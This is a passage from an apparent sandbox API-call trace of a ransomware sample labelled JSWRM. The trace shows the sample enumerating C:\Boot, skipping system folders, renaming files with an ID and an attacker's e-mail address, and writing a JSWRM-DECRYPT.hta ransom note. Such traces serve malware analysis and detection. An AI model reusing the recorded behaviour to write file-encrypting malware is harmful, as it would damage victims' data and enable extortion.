lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.808] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.808] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.808] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.809] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.809] CloseHandle (hObject=0xffffffff) returned 1 [0063.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0063.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.810] MoveFileW (lpExistingFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.810] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb1deb7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cb1deb7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cb1deb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.810] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0063.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0063.811] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.811] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.811] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.811] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.812] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.812] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.812] CloseHandle (hObject=0xffffffff) returned 1 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0063.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226930 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0063.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226930 | out: hHeap=0x1e0000) returned 1 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.812] MoveFileW (lpExistingFileName="C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\fi-FI\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.812] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.812] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0063.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.813] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="Fonts", cAlternateFileName="")) returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2=".") returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="..") returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="...") returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="windows") returned -1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="recovery") returned -1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="perflogs") returned -1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="documents and settings") returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="$RECYCLE.BIN") returned 1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="system volume information") returned -1 [0063.813] lstrcmpiW (lpString1="Fonts", lpString2="msocache") returned -1 [0063.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0063.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0063.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.813] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fonts\\jswrm-decrypt.hta")) returned 0xffffffff [0063.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0063.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236d68 [0063.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.816] CreateFileW (lpFileName="C:\\Boot\\Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fonts\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.817] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.817] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.819] CloseHandle (hObject=0x450) returned 1 [0063.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236d68 | out: hHeap=0x1e0000) returned 1 [0063.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0063.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.820] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\fonts\\jswrm-decrypt.hta")) returned 0x20 [0063.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0063.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0063.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.820] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cb1deb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232180 [0063.820] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.820] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cb1deb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.821] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.821] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.821] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2=".") returned 1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="..") returned 1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="...") returned 1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="windows") returned -1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="recovery") returned -1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="perflogs") returned -1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="documents and settings") returned -1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.821] 